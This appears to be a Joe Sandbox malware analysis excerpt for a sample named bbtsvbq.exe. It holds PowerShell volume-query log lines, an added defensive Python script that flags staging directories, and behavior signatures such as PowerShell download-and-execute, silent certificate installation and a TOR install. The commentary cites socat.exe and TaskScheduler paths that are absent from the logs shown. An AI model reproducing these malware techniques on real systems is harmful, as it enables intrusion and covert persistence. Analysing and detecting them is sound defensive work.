Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.JScript\8.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.JScript\8.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
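Most of the entries above are a .NET host (powershell.exe) probing GAC assemblies and its own shortcuts, which is baseline noise; the signal is the two paths outside Windows and Microsoft directories: the TaskScheduler DLL under a randomly named Temp folder and socat.exe running out of a randomly named ProgramData folder. The following Python is an added example, not part of the Joe Sandbox report, that parses lines in the shape shown above (including the fused "powershell.exeQueries" rendering) and separates staging locations from the baseline. The trusted-prefix list and the random-name heuristic are assumptions chosen for this example, not rules the report states; the sample lines are copied from the entries above.

```python
import re
from collections import defaultdict

# Constructed sample input: five lines in the shape of the report's
# "Queries volume information" entries. The report renders the "Source:" path
# and the signature text with no separator ("powershell.exeQueries ..."), so
# the parser accepts both the fused and the spaced form.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\Microsoft.Win32.TaskScheduler.dll VolumeInformation",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation",
    r"Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeQueries volume information: C:\ProgramData\VitBTKxRu VolumeInformation",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation",
]

LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?\.(?:exe|dll))\s*"
    r"Queries volume information:\s*(?P<target>.+?)\s+VolumeInformation\s*$"
)

# Baseline: a .NET host probing framework assemblies and Microsoft shortcuts
# is expected. These prefixes are an assumption about a stock Windows image.
TRUSTED_PREFIXES = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
    "c:\\programdata\\microsoft\\",
)
# Roots a dropper commonly stages payloads under; both appear in the report.
STAGING_ROOTS = ("\\appdata\\local\\temp\\", "c:\\programdata\\")


def parse_line(line):
    """Return (source_process, queried_path) or None if the line is not a volume query."""
    m = LINE_RE.match(line.strip())
    return (m.group("source"), m.group("target")) if m else None


def staging_dir(path):
    """First directory component below a staging root (e.g. 'VitBTKxRu'), or None."""
    p = path.lower()  # ASCII paths only: lower() keeps offsets aligned with `path`
    for root in STAGING_ROOTS:
        idx = p.find(root)
        if idx != -1:
            first = path[idx + len(root):].split("\\", 1)[0]
            return first or None
    return None


def looks_random(name):
    """Heuristic (an assumption, not a report rule) for generated names such as
    VitBTKxRu or 2HVmGbfK7qLuRZ: 8+ alphanumeric chars, mixed case, 3+ case flips."""
    if len(name) < 8 or not name.isalnum():
        return False
    if not (any(c.islower() for c in name) and any(c.isupper() for c in name)):
        return False
    flips = sum(
        1 for a, b in zip(name, name[1:])
        if a.isalpha() and b.isalpha() and a.islower() != b.islower()
    )
    return flips >= 3


def classify(path):
    """Bucket a path: volume-root, trusted, staging-random, staging, or other."""
    p = path.lower()
    if p in ("c:\\", "c:"):
        return "volume-root"
    if p.startswith(TRUSTED_PREFIXES):
        return "trusted"
    d = staging_dir(path)
    if d is not None:
        return "staging-random" if looks_random(d) else "staging"
    return "other"


def triage(lines):
    """Map each source process to {bucket: sorted unique paths} over the report lines."""
    buckets = defaultdict(lambda: defaultdict(set))
    for source, target in filter(None, map(parse_line, lines)):
        buckets[source][classify(target)].add(target)
    return {s: {k: sorted(v) for k, v in b.items()} for s, b in buckets.items()}


def suspicious_sources(lines):
    """Processes that are themselves running from a staging directory."""
    return sorted({src for src, _ in filter(None, map(parse_line, lines))
                   if classify(src).startswith("staging")})


if __name__ == "__main__":
    for source, b in triage(SAMPLE_LINES).items():
        print(source)
        for bucket, paths in sorted(b.items()):
            for path in paths:
                print(f"  [{bucket}] {path}")
    print("processes running from staging dirs:", suspicious_sources(SAMPLE_LINES))
```

Run against the full behavior listing, the "trusted" bucket absorbs the GAC and Start Menu noise, "staging-random" isolates the two dropped locations, and suspicious_sources() surfaces socat.exe as a process executing from a generated ProgramData path. The case-flip heuristic is deliberately loose; on a real triage it would be one signal alongside the dropped-file list and the process tree, not a verdict on its own.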

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 446656
Sample: bbtsvbq.exe
Start date: 27/11/2017
Architecture: WINDOWS
Score: 100

The rendered graph did not survive extraction; the node contents below are what remains of it.

Processes started from the main node:
  • bbtsvbq.exe (counters 3 and 14: created registry values and created files, in legend order)
  • taskeng.exe (counter 1)

Signature nodes:
  • Sets an auto configuration URL for Internet Explorer (IE settings are enforced automatically)
  • Obfuscated command line found
  • PowerShell starts a process from the temp directory (4 nodes)
  • Tries to download and execute files (via PowerShell) (4 nodes)
  • Found C# or VB.Net code to silently install a certificate (suppress security dialog) (3 nodes)
  • Detected TCP or UDP traffic on non-standard ports (4 nodes)
  • Installs TOR (Internet Anonymizer) (3 nodes)
  • Signatures exceeded maximum capacity for this level: 3 signatures hidden (3 nodes), 6 signatures hidden (3 nodes), 2 signatures hidden (1 node)

DNS/IP node:
  • api.ipify.org 174.129.241.106, port 80